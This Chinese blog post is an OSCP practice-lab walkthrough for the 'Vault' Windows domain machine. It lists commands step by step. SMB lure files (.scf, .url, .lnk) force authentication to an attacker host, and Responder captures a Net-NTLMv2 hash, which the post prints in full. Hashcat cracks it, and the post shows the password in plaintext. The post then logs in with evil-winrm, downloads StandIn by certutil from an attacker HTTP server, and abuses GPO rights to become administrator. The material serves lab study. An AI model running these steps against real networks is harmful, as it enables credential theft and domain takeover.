OSCP 靶场 - Vault

已于 2024-03-08 12:07:00 修改
阅读量452 收藏 9
点赞数 8
文章标签: web安全 安全 网络
于 2024-01-04 15:26:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_69775412/article/details/135388024
版权

端口扫描 nmap

nmap -O 192.168.162.172

smb枚举 smbmap(kali自带)

//枚举GUEST用户可以使用的目录
smbmap -u GUEST -H 192.168.162.172

NTLMrelay—smbrelay

1.制作钓鱼文件 使用GitHub - xct/hashgrab: generate payloads that force authentication against an attacker machine

python3 hashgrab.py 192.168.45.212 test

2. 上传钓鱼文件 使用smbclient(kali自带)

smbclient \\\\192.168.162.172\\DocumentsShare -U GUEST

smb: \> put @test.scf
smb: \> put @test.url 
smb: \> put test.lnk

3. 开启responder(kali自带)监听,获取net-ntlm哈希

responder -I tun0

结果

anirudh::VAULT:8f86997471383614:4B76E3A7DF0BF24945D0A85F4575DF13:010100000000000000FF17E898FAD90199787A61B1D7F0CF0000000002000800380043004600580001001E00570049004E002D005A0052003000440048004B004F004800460046004A0004003400570049004E002D005A0052003000440048004B004F004800460046004A002E0038004300460058002E004C004F00430041004C000300140038004300460058002E004C004F00430041004C000500140038004300460058002E004C004F00430041004C000700080000FF17E898FAD9010600040002000000080030003000000000000000010000000020000077EEB54469D1F6103BA0F72DC177ACE44970D6FADE091CA17405179482A7C5F20A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003200310032000000000000000000

破解ntlm

1.准备好被破解的hash文件

2.准备好大字典(自己下载)

3.使用hashcat(kali自带) 破解得到密码

 hashcat -m 5600 -a 0 hashes.txt dict_big.txt --force

winrm工具连接目的主机—evil-winrm(kali自带)

evil-winrm -u ANIRUDH -p SecureHM -i 192.168.162.172

获取shell

桌面获取Flag1

gpo提权

使用GitHub - FuzzySecurity/StandIn: StandIn is a small .NET35/45 AD post-exploitation toolkit

原理: 通过工具枚举出当前用户在域控中的权限, 发现对域控有完全控制权限,然后将当前账号修改为本地管理员提权。

1. kali上准备好工具,python开启简易http

python3 -m http.server 8080

2. 被攻击主机下载工具

certutil.exe -urlcache -split -f http://192.168.45.166:8080/standin45.exe

3. 通过gpo提权

枚举出GPO

*Evil-WinRM* PS C:\Users\anirudh\Desktop> .\StandIn_v13_Net45.exe --gpo
[?] Object   : CN={6AC1786C-016F-11D2-945F-00C04fB984F9}
    Path     : LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
    DisplayName              : Default Domain Controllers Policy
    CN                       : {6AC1786C-016F-11D2-945F-00C04fB984F9}
    GPCFilesysPath           : \\vault.offsec\sysvol\vault.offsec\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
    GPCMachineExtensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
    WhenCreated              : 11/19/2021 8:50:33 AM
    WhenChanged              : 11/19/2021 8:50:33 AM

[?] Object   : CN={31B2F340-016D-11D2-945F-00C04FB984F9}
    Path     : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
    DisplayName              : Default Domain Policy
    CN                       : {31B2F340-016D-11D2-945F-00C04FB984F9}
    GPCFilesysPath           : \\vault.offsec\sysvol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
    GPCMachineExtensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
    WhenCreated              : 11/19/2021 8:50:33 AM
    WhenChanged              : 11/19/2021 9:00:32 AM

查看Default Domain Policy的用户权限,发现anirudh具备完全控制权限

*Evil-WinRM* PS C:\Users\anirudh\Desktop> .\StandIn_v13_Net45.exe --gpo --filter "Default Domain Policy" --acl
[+] Account       : VAULT\anirudh
    Type          : Allow
    Rights        : FullControl
    Inherited ACE : False
    Propagation   : None

将anirubh 修改为localadmin

*Evil-WinRM* PS C:\Users\anirudh\Desktop> .\StandIn_v13_Net45.exe --gpo --filter "Default Domain Policy" --localadmin anirudh

刷新权限

*Evil-WinRM* PS C:\Users\anirudh\Desktop> gpupdate /force

此时anirubh 具备管理员权限, 进入administrator桌面即可拿到flag2

阿一网络安全
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OSCP - vulnhub BILLY MADISON: 1.1 靶机测试
m0_55751267的博客
08-12 983
BILLY MADISON: 1.1 靶机测试
靶场实战(12):OSCP备考之VulnHub SEPPUKU
OneMoreThink
01-09 1000
打靶思路资产发现主机发现服务发现(端口、服务、组件、版本)漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞(目录、文件)7080端口/HTTPS服务组件漏洞URL漏洞(目录、文件)7601端口/HTTP服务组件漏洞URL漏洞(目录、文件)提升权限seppuku用户sudosuidcron内核提权信息收集samurai用户sudosuidcron内核提...
OSCP推荐靶场-FristiLeaks
qq_63785498的博客
10-06 361
SetUID(Set User ID)是一种特殊的权限,它允许一个程序在执行时以文件所有者的身份运行,而不是执行者的身份。这样做的效果是,命令的标准输入会与网络套接字的输出连接,从而允许远程计算机发送命令到被攻击者的计算机。: 这个选项指定了发送扫描请求的最小速率,即在扫描中发送数据包的最小速度。: 这是一个I/O重定向操作符,它将一个文件描述符(在这里是标准输出)连接到另一个文件描述符。: 这是Shell程序的名称,它会启动一个新的Shell会话。: 这是Linux系统上的一个用于查找文件和目录的命令。
OSCP 2021攻略之旅--从小白到通过
热门推荐
ShadowBlade
08-08 2万+
发布此文章,能够让更多想学习通过OSCP的同学得到更好的指导。
OSCP靶场系列-Esay-BBSCute保姆级
杳若的博客
07-23 5598
BBSCute保姆级靶场流程
javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
OSCP-PWK:https
04-27
OSCP 提供了更好的阅读体验,因为回购协议大多类似于草稿和备份。 注释和备忘单位于Wiki页面中。 回购中充斥着TryHackMe编写的内容和二进制文件。 卡利配置 ohmyzsh + powerlevel10K + tmux Kali 2020.3的提示:...
OSCP-Human-Guide:我自己的OSCP指南
05-12
OSCP-人类指南 编辑我目前正在将所有OSCP内容和其他内容移动到“ ”中。 该存储库将没有更多更新。 带来不便敬请谅解。 该页面是一些技巧的真实记录,真正的指南是 我自己的OSCP指南,包括一些礼物,我自己制作的和...
oscp-command-filtering-tool
03-08
oscp命令过滤工具特征根据工具,语言,意图,端口或操作系统轻松过滤命令自动更新kali和受害者IP地址,因此您不必手动修改命令过滤器很容易修改,可以添加/删除内容,也可以从全新开始用法替换所有IP(kali_ip)->要...
OSCP系列靶场-Esay-PyExp保姆级
杳若的博客
08-21 1703
OSCP系列靶场-Esay-PyExp保姆级
靶场实战(7):OSCP备考之VulnHub Potato 1
OneMoreThink
01-04 1044
靶机官网:Potato: 1[1]实战思路:主机发现端口发现(服务、组件、版本)漏洞发现(获取权限)2112端口/FTP服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞1(目录、文件)URL漏洞2(目录、文件)22端口/SSH服务组件漏洞口令漏洞提升权限01、suid02、cron03、sudo一、主机发现本次攻击指定IP,不涉及主机发现过程。二、端口发现(服务、组件、版本)使用命令s...
OSCP靶场1-SolidState(smtp、pop3、james)
墨痕诉清风的博客
04-22 327
注:如果下载文件,通过 python -m http.server 80,进入 /tmp文件夹下载,否则经常出现没有权限。1. 可以看到这是台32位 debian 操作系统,内核版本 Linux 4.9.0,可以进行查找该内核提权漏洞。根据exp解释,当登录任意用户将执行反弹shell,利用了 /etc/bash_completion.d 机制。成功反弹,且因为payload利用的是sh,已经不受限制rbash了。利用ssh登录,但是被rbash限制,非常多的命令不能使用,退出。
OSCP系列靶场-Esay-Shakabrah
杳若的博客
08-16 170
OSCP系列靶场-Esay-Shakabrah
OSCP系列靶场-Esay-Sumo
HUANGXIN9898的博客
09-19 160
从发现ssh版本开始就感觉有点偏老,应该多尝试老漏洞有时候nikto工具也可以适当用一下,指不定有其他收获。
靶场实战(15):OSCP备考之VulnHub STAPLER
OneMoreThink
01-13 959
打靶思路资产发现主机发现服务发现漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞139端口/SMB服务组件漏洞口令漏洞666端口/doom服务组件漏洞其它漏洞80端口/HTTP服务组件漏洞URL漏洞12380端口/HTTP服务组件漏洞URL漏洞12380端口/HTTPS服务组件漏洞URL漏洞提升权限www-data用户sudosuid cron内核提权信息收集JKanode用户sud...
OSCP系列靶场-Esay-Ha-natraj
hackzkaq的博客
01-02 871
getwebshell → 目录扫描发现端点 → 发现文件读取 → 验证确认是文件包含 → 包含了ssh登录日志 → 反弹shell包含提 权 思 路 → 发现sudo级别的apache2服务 →apache2服务启动时修改其用户权限 → 重启apache2从目录权限提升到用户权限 →sudo-nmap权限提升。
靶场实战(20):OSCP备考之内网靶场红日7
最新发布
OneMoreThink
03-06 990
欢迎提出建议、欢迎分享文章、欢迎关注公众号 OneMoreThink 。目录第一层网络(10.58.81.0/24)VPN/Wi-Fi(10.58.81.108)获取权限Web1(10.58.81.107)获取权限搭建隧道第二层网络(192.168.52.0/24)PC1(192.168.52.30)获取权限搭建隧道信息收集Web2(192.168.52.20)获取权限提升权限容器逃逸第三层网络(...
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全网络渗透感兴趣的读者来说是一个很有价值的参考资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值